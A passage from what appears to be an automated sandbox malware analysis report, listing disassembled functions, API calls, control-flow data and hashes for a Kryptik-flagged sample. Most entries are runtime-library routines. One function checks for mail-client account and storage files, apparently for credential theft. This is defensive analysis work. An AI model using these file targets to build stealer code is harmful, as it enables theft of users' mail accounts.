                                                              • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                              • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                              • String ID: csm
                                                              • API String ID: 1170836740-1018135373
                                                              • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                              • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                              • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                              • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                              Function 1000925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                              • _free.LIBCMT ref: 100092AB
                                                                • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                              • _free.LIBCMT ref: 100092B6
                                                              • _free.LIBCMT ref: 100092C1
                                                              • _free.LIBCMT ref: 10009315
                                                              • _free.LIBCMT ref: 10009320
                                                              • _free.LIBCMT ref: 1000932B
                                                              • _free.LIBCMT ref: 10009336
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                              • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                              • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                              • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                              Function 10008821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 488 10008821-1000883a 489 10008850-10008855 488->489 490 1000883c-1000884c call 10009341 488->490 491 10008862-10008886 MultiByteToWideChar 489->491 492 10008857-1000885f 489->492 490->489 500 1000884e 490->500 494 10008a19-10008a2c call 10002ada 491->494 495 1000888c-10008898 491->495 492->491 497 1000889a-100088ab 495->497 498 100088ec 495->498 501 100088ca-100088db call 100056d0 497->501 502 100088ad-100088bc call 1000bf20 497->502 504 100088ee-100088f0 498->504 500->489 506 10008a0e 501->506 516 100088e1 501->516 502->506 515 100088c2-100088c8 502->515 505 100088f6-10008909 MultiByteToWideChar 504->505 504->506 505->506 509 1000890f-1000892a call 10005f19 505->509 510 10008a10-10008a17 call 10008801 506->510 509->506 520 10008930-10008937 509->520 510->494 519 100088e7-100088ea 515->519 516->519 519->504 521 10008971-1000897d 520->521 522 10008939-1000893e 520->522 524 100089c9 521->524 525 1000897f-10008990 521->525 522->510 523 10008944-10008946 522->523 523->506 526 1000894c-10008966 call 10005f19 523->526 527 100089cb-100089cd 524->527 528 10008992-100089a1 call 1000bf20 525->528 529 100089ab-100089bc call 100056d0 525->529 526->510 543 1000896c 526->543 532 10008a07-10008a0d call 10008801 527->532 533 100089cf-100089e8 call 10005f19 527->533 528->532 541 100089a3-100089a9 528->541 529->532 542 100089be 529->542 532->506 533->532 546 100089ea-100089f1 533->546 545 100089c4-100089c7 541->545 542->545 543->506 545->527 547 100089f3-100089f4 546->547 548 10008a2d-10008a33 546->548 549 100089f5-10008a05 WideCharToMultiByte 547->549 548->549 549->532 550 10008a35-10008a3c call 10008801 549->550 550->510
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                              • __freea.LIBCMT ref: 10008A08
                                                                • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                              • __freea.LIBCMT ref: 10008A11
                                                              • __freea.LIBCMT ref: 10008A36
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1414292761-0
                                                              • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                              • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                              • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                              • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                              Function 100015DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _strlen.LIBCMT ref: 10001607
                                                              • _strcat.LIBCMT ref: 1000161D
                                                              • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                              • lstrcatW.KERNEL32(?,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 1000165A
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                              • lstrcatW.KERNEL32(00001008,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 10001686
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: lstrcatlstrlen$_strcat_strlen
                                                              • String ID:
                                                              • API String ID: 1922816806-0
                                                              • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                              • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                              • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                              • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                              Function 10001000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 10001038
                                                              • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                              • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                              • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$AttributesFilelstrcat
                                                              • String ID:
                                                              • API String ID: 3594823470-0
                                                              • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                              • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                              • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                              • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                              Function 10003856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                              • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastValue___vcrt_
                                                              • String ID:
                                                              • API String ID: 3852720340-0
                                                              • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                              • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                              • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                              • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                              Function 10005AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                              • _free.LIBCMT ref: 10005B2D
                                                              • _free.LIBCMT ref: 10005B55
                                                              • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                              • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                              • _abort.LIBCMT ref: 10005B74
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_free$_abort
                                                              • String ID:
                                                              • API String ID: 3160817290-0
                                                              • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                              • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                              • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                              • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                              Function 100011EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                              • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                              • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                              • API String ID: 4036392271-1520055953
                                                              • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                              • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                              • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                              • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                              Function 10004B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004B6C
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                              • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                              • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                              • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                              Function 10007153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                              • _free.LIBCMT ref: 100071B8
                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                              • String ID:
                                                              • API String ID: 336800556-0
                                                              • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                              • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                              • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                              • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                              Function 10005B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                              • _free.LIBCMT ref: 10005BB4
                                                              • _free.LIBCMT ref: 10005BDB
                                                              • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                              • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_free
                                                              • String ID:
                                                              • API String ID: 3170660625-0
                                                              • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                              • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                              • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                              • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                              Function 10001E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                              • lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                              • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                              • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                              • lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$lstrcat
                                                              • String ID:
                                                              • API String ID: 493641738-0
                                                              • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                              • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                              • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                              • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                              Function 100091B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 100091D0
                                                                • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                              • _free.LIBCMT ref: 100091E2
                                                              • _free.LIBCMT ref: 100091F4
                                                              • _free.LIBCMT ref: 10009206
                                                              • _free.LIBCMT ref: 10009218
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                              • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                              • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                              • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                              Function 10005351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 1000536F
                                                                • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                              • _free.LIBCMT ref: 10005381
                                                              • _free.LIBCMT ref: 10005394
                                                              • _free.LIBCMT ref: 100053A5
                                                              • _free.LIBCMT ref: 100053B6
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                              • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                              • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                              • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                              Function 10004BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe,00000104), ref: 10004C1D
                                                              • _free.LIBCMT ref: 10004CE8
                                                              • _free.LIBCMT ref: 10004CF2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _free$FileModuleName
                                                              • String ID: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                                                              • API String ID: 2506810119-3620008145
                                                              • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                              • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                              • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                              • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                              Function 100086E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                              • __freea.LIBCMT ref: 100087D5
                                                                • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                              • String ID:
                                                              • API String ID: 2652629310-0
                                                              • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                              • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
